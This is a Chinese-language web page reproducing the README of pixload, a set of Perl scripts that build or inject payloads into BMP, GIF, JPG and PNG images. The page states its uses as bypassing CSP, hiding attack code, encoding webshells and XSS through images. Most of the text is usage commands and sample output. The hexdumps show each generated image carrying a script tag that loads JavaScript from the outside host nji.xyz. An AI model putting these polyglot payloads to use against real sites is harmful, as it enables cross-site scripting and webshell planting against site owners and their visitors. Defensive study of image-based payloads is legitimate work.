pixload:图片Payload创建注入工具

pixload

用于创建/将Payload注入图片的工具集。其用途与安全防范场景例如:绕过CSP防护,用图片隐藏恶意攻击代码,在图片中编码webshell,利用图片进行XSS等等。

pixload安装

需要以下Perl模块:

  • GD
  • Image::ExifTool
  • String::CRC32
git clone https://github.com/chinarulezzz/pixload

在 Debian-based 的系统上安装以下软件包:

sudo apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl

在OSX上请参考此解决方法(thnx 2 @iosdec)。

pixload TOOLS

bmp.pl

BMP Payload 创建/注入.

Usage

./bmp.pl [-payload 'STRING'] -output payload.bmp

If the output file exists, then the payload will be injected into the
existing file.Else the new one will be created.

Example

./bmp.pl -output payload.bmp

[>| BMP Payload Creator/Injector|<]

https://github.com/chinarulezzz/pixload


[>] Generating output file
[✔] File saved to: payload.bmp

[>] Injecting payload into payload.bmp
[✔] Payload was injected successfully

payload.bmp: PC bitmap, OS/2 1.x format, 1 x 1

0000000042 4d 2f 2a 00 00 00 0000 00 1a 00 00 00 0c 00|BM/*............|
0000001000 00 01 00 01 00 01 0018 00 00 00 ff 00 2a 2f|..............*/|
000000203d 31 3b 3c 73 63 72 6970 74 20 73 72 63 3d 2f|=1;<script src=/|
000000302f 6e 6a 69 2e 78 79 7a3e 3c 2f 73 63 72 69 70|/nji.xyz></scrip|
0000004074 3e 3b|t>;|
00000043

gif.pl

GIF Payload 创建/注入.

Usage

./gif.pl [-payload 'STRING'] -output payload.gif

If the output file exists, then the payload will be injected into the
existing file.Else the new one will be generated.

Example

./gif.pl -output payload.gif

[>|GIF Payload Creator/Injector |<]

https://github.com/chinarulezzz/pixload


[>] Generating output file
[✔] File saved to: payload.gif

[>] Injecting payload into payload.gif
[✔] Payload was injected successfully

payload.gif: GIF image data, version 87a, 10799 x 32

0000000047 49 46 38 37 61 2f 2a20 00 80 00 00 04 02 04|GIF87a/* .......|
0000001000 00 00 2c 00 00 00 0020 00 20 00 00 02 1e 84|...,.... . .....|
000000208f a9 cb ed 0f a3 9c b4da 8b b3 de bc fb 0f 86|................|
00000030e2 48 96 e6 89 a6 ea cab6 ee 0b 9b 05 00 3b 2a|.H............;*|
000000402f 3d 31 3b 3c 73 63 7269 70 74 20 73 72 63 3d|/=1;<script src=|
000000502f 2f 6e 6a 69 2e 78 797a 3e 3c 2f 73 63 72 69|//nji.xyz></scri|
0000006070 74 3e 3b |pt>;|
00000064

jpg.pl

JPG Payload 创建/注入.

Usage

./jpg.pl [-payload 'STRING'] -output payload.jpg

If the output file exists, then the payload will be injected into the
existing file.Else the new one will be created.

Example

./jpg.pl -output payload.jpg

[>|JPEG Payload Creator/Injector|<]

https://github.com/chinarulezzz/pixload


[>] Generating output file
[✔] File saved to: payload.jpg

[>] Injecting payload into comment tag
[✔] Payload was injected successfully

payload.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96,
segment length 16, comment: "<script src=//nji.xyz></script>", baseline,
precision 8, 32x32, components 3

00000000ff d8 ff e0 00 10 4a 4649 46 00 01 01 01 00 60|......JFIF.....`|
0000001000 60 00 00 ff fe 00 213c 73 63 72 69 70 74 20|.`.....!<script |
0000002073 72 63 3d 2f 2f 6e 6a69 2e 78 79 7a 3e 3c 2f|src=//nji.xyz></|
0000003073 63 72 69 70 74 3e ffdb 00 43 00 08 06 06 07|script>...C.....|
0000004006 05 08 07 07 07 09 0908 0a 0c 14 0d 0c 0b 0b|................|
000000500c 19 12 13 0f 14 1d 1a1f 1e 1d 1a 1c 1c 20 24|.............. $|
000000602e 27 20 22 2c 23 1c 1c28 37 29 2c 30 31 34 34|.' ",#..(7),0144|
0000007034 1f 27 39 3d 38 32 3c2e 33 34 32 ff db 00 43|4.'9=82<.342...C|
0000008001 09 09 09 0c 0b 0c 180d 0d 18 32 21 1c 21 32|...........2!.!2|
0000009032 32 32 32 32 32 32 3232 32 32 32 32 32 32 32|2222222222222222|
*
...
000002a6

png.pl

PNG Payload 创建/注入.

Usage

./png.pl [-payload 'STRING'] -output payload.png

If the output file exists, then the payload will be injected into the
existing file.Else the new one will be created.

Example

./png.pl -output payload.png

[>|PNG Payload Creator/Injector |<]

https://github.com/chinarulezzz/pixload


[>] Generating output file
[✔] File saved to: payload.png

[>] Injecting payload into payload.png

[+] Chunk size: 13
[+] Chunk type: IHDR
[+] CRC: fc18eda3
[+] Chunk size: 9
[+] Chunk type: pHYs
[+] CRC: 952b0e1b
[+] Chunk size: 25
[+] Chunk type: IDAT
[+] CRC: c8a288fe
[+] Chunk size: 0
[+] Chunk type: IEND

[>] Inject payload to the new chunk: 'pUnk'
[✔] Payload was injected successfully

payload.png: PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced

0000000089 50 4e 47 0d 0a 1a 0a00 00 00 0d 49 48 44 52|.PNG........IHDR|
0000001000 00 00 20 00 00 00 2008 02 00 00 00 fc 18 ed|... ... ........|
00000020a3 00 00 00 09 70 48 5973 00 00 0e c4 00 00 0e|.....pHYs.......|
00000030c4 01 95 2b 0e 1b 00 0000 19 49 44 41 54 48 89|...+......IDATH.|
00000040ed c1 31 01 00 00 00 c2a0 f5 4f ed 61 0d a0 00|..1.......O.a...|
0000005000 00 6e 0c 20 00 01 c8a2 88 fe 00 00 00 00 49|..n. ..........I|
0000006045 4e 44 ae 42 60 82 0000 00 00 00 00 00 00 00|END.B`..........|
0000007000 00 00 00 00 00 00 0000 00 00 00 00 00 00 00|................|
*
000000c000 1f 70 55 6e 6b 3c 7363 72 69 70 74 20 73 72|..pUnk<script sr|
000000d063 3d 2f 2f 6e 6a 69 2e78 79 7a 3e 3c 2f 73 63|c=//nji.xyz></sc|
000000e072 69 70 74 3e 9d 11 5497 00 49 45 4e 44|ript>..T..IEND|
000000ee
点赞(2)
一个用于伪造IP地址进行爆破的BurpSuite插件:BurpFakeIP 替换Google CDN资源库,解决Google fonts/ajax/API等加载失败问题